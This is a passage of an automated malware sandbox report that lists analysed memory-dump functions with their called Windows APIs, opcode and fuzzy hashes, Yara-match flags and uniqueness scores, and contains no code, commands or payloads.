                  • Instruction ID: 652203d3a19b78f4a73d9d3492c7fd79f680abeb2fe4ec02ca9961e177367513
                  • Opcode Fuzzy Hash: 03483e9a080ff38d47d8c70e029c77ba00c0802351a7552a0162c0b8bdd365ce
                  • Instruction Fuzzy Hash: 7611C271620301EFEB25DF64CCC5B693AE0EB35320F710251FB12972E9E2B4D880C626
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlEncodePointer.NTDLL(00000000), ref: 1FFEBE72
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  • Opcode ID: 49a8d886b494c6dddb0f99e14173ef7f734bb3bb0fa2026254ede01d655c5b9f
                  • Instruction ID: e8fc108de91b22bfd4acb40888f8ff65d1f2e41491f530853eeb637f9a9d1a98
                  • Opcode Fuzzy Hash: 49a8d886b494c6dddb0f99e14173ef7f734bb3bb0fa2026254ede01d655c5b9f
                  • Instruction Fuzzy Hash: 3221CD71909B998FEB10CFA8C9447CEBFF0EB0A310F18856ED046A3612C3796944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 47d33da60e278956f019f6b1436c3bb623ab213b3eef004968ad41359dc8150f
                  • Instruction ID: 56f7c300395f4c8c85ff573e3a4981cb349ccb024c54be4c50e99e9eb34474f0
                  • Opcode Fuzzy Hash: 47d33da60e278956f019f6b1436c3bb623ab213b3eef004968ad41359dc8150f
                  • Instruction Fuzzy Hash: 96110771970782DBCB10FBF4DC837E433D09B26318F280669D55887118E3EB62914A87
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlEncodePointer.NTDLL(00000000), ref: 1FFEBE72
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  • Opcode ID: d7a6858711d3ee026d5d9307f01ea4b3fcfbf4bb2625497cbd0c7cde60c14e92
                  • Instruction ID: 818ccf98656ccf8a7e1cc71569ffeea6642cd39677e8f9bbf62c7c3fd3a60db9
                  • Opcode Fuzzy Hash: d7a6858711d3ee026d5d9307f01ea4b3fcfbf4bb2625497cbd0c7cde60c14e92
                  • Instruction Fuzzy Hash: F511A670900B4ACFEB20CFA9C948B8EBBF4FB49324F14802ED506A3601D7796944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 24fb3f676163d7dec600cd3079c9afbb2fb8042867736a4d5be6673bbff208e3
                  • Instruction ID: 123c190bb298c9dac388ab6a14c2e1e7a182a396f3a61e6b58790e08c199908c
                  • Opcode Fuzzy Hash: 24fb3f676163d7dec600cd3079c9afbb2fb8042867736a4d5be6673bbff208e3
                  • Instruction Fuzzy Hash: E5F058909741DBA6CE20FBA86902BF915D98B307B5F700227F98E9040D97A049C345A7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 39a2a52143c86c55e218ae4933dba39cf0a3a1f29ce3183ad7171402938c9df2
                  • Instruction ID: 16e0644749c64f0075854a02e02082d1b3cc982bf9ba09888e28c7de3793285b
                  • Opcode Fuzzy Hash: 39a2a52143c86c55e218ae4933dba39cf0a3a1f29ce3183ad7171402938c9df2
                  • Instruction Fuzzy Hash: 5CF0F972690741CBCB10DBF8DCC76C133E0AB1731872D46A995648B224F2EF62A18A86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: ed99cfce970eaed251d6fc8010d06aa46e1dfe4091fcf5a41a7a3b158e2f5878
                  • Instruction ID: 20592817f74ee2aad72237376ab035c2d88b922893302f0f52a6ef4cdc028028
                  • Opcode Fuzzy Hash: ed99cfce970eaed251d6fc8010d06aa46e1dfe4091fcf5a41a7a3b158e2f5878
                  • Instruction Fuzzy Hash: CBF062716A0742CBCB10EFF4DC875D533E0AB2735872C45A99965CB224F3FF61628A86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: c786e1810eac0f4e467adb0c7a1271e5b0998c424a196824002c9e5b1626d38d
                  • Instruction ID: 0387b3256a3e8a21a5bab6a566117cb16bc221be15e41e63aac295e163d38573
                  • Opcode Fuzzy Hash: c786e1810eac0f4e467adb0c7a1271e5b0998c424a196824002c9e5b1626d38d
                  • Instruction Fuzzy Hash: F1F00271690752CFCB10DBF8DC875C533E0AB1731872D45A99564CB224F7FF62618A86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,012129A2,01212A19), ref: 012129E6
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 0d5d5cdaa26b647f23159786ef3b9e514311ffef3619a2a98e6cf75b0ff9d080
                  • Instruction ID: 3ba2d75fd6c9c522a778ba77b3dbcc762a7b7215ea9699a366f85ccb47efc877
                  • Opcode Fuzzy Hash: 0d5d5cdaa26b647f23159786ef3b9e514311ffef3619a2a98e6cf75b0ff9d080
                  • Instruction Fuzzy Hash: 1EC04C753A0300BAF6345A208CA6F9965165B50F01E70841CB7463C4C185F0A551851C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.474155472.000000001DC4D000.00000040.00000001.sdmp, Offset: 1DC4D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a78b6035a904772aa6fe979d0e3ef028f248eb922edecd2a100075c4bac96954
                  • Instruction ID: eeda4018ab90be984f39c0f3b6efdc0407f2de0122a6ce5ebf9212b04b85cdc2
                  • Opcode Fuzzy Hash: a78b6035a904772aa6fe979d0e3ef028f248eb922edecd2a100075c4bac96954
                  • Instruction Fuzzy Hash: 7921F271604348DFCB05EF18D9C4B16BBA1FB88724F34C9ADE9494B246C33AD806CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.474155472.000000001DC4D000.00000040.00000001.sdmp, Offset: 1DC4D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 543c9bc43f8b9d3430e304fee7c49a50587c9d4b41f88c6e3b4010ae925a675f
                  • Instruction ID: fcdeee96f752c910c186073be8c85176283e2affea56bc341dc01f7168f4c652
                  • Opcode Fuzzy Hash: 543c9bc43f8b9d3430e304fee7c49a50587c9d4b41f88c6e3b4010ae925a675f
                  • Instruction Fuzzy Hash: 862162755087849FC702DF14D994B12BF71EB46314F24C5AAD8498B296C33AD856CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadMemoryProtectVirtual
                  • String ID:
                  • API String ID: 3389902171-0
                  • Opcode ID: bd97f30533509312c712462d862ad67015277a7e0d6b534393eb4f965b436b78
                  • Instruction ID: 4354f844cfa4a8c268148ff3162f252f0aa41fd79f6435ec7b7a083a5de8790b
                  • Opcode Fuzzy Hash: bd97f30533509312c712462d862ad67015277a7e0d6b534393eb4f965b436b78
                  • Instruction Fuzzy Hash: DF7189619243828EDB26DF28C4D4B65BAD19FB7324F44C2D9D6A64F2DFD3748442C722
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadMemoryProtectVirtual
                  • String ID:
                  • API String ID: 3389902171-0
                  • Opcode ID: f50b7b843bf08c7c9f40a4d0420ce81cb5e58a1f26c20ad95f7c7565c5415b99
                  • Instruction ID: 723f0e224b80820d6919952c3599ddb773cd5efa3313a4b2a5073a2dc40832dc
                  • Opcode Fuzzy Hash: f50b7b843bf08c7c9f40a4d0420ce81cb5e58a1f26c20ad95f7c7565c5415b99
                  • Instruction Fuzzy Hash: E651D271560342CFCB16CFB8C8C5B9177E1AF67324F1882D8C9A58F2A6E37A9041C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe38f0434fa8a09136dda7d88c4ab6c657014005fe73f8dc2003e792f10bb57a
                  • Instruction ID: 02c6af96ec81e317f0508e1123de1acfe4ad6f0e6d6560a0acbc92dc95fa147c
                  • Opcode Fuzzy Hash: fe38f0434fa8a09136dda7d88c4ab6c657014005fe73f8dc2003e792f10bb57a
                  • Instruction Fuzzy Hash: 10E06D713207818FD329EF18C5D0E1A73E7AF65310F1198A5EA09CB22DC734EC40CA11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                  • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                  • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                  • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09e149ba2ddd085fd762ef558804b4cbc5aee09a177950a5eea331633bb75620
                  • Instruction ID: 20ae3aa0749be68a3049daf0cd52a3c31da700ecf0f3e1e6346692965aabc0d4
                  • Opcode Fuzzy Hash: 09e149ba2ddd085fd762ef558804b4cbc5aee09a177950a5eea331633bb75620
                  • Instruction Fuzzy Hash: 88B09234634680CFCE99DA0AC190E4073B0F714720B815881E045CBA11C3A4E800CA00
                  Uniqueness

                  Uniqueness Score: -1.00%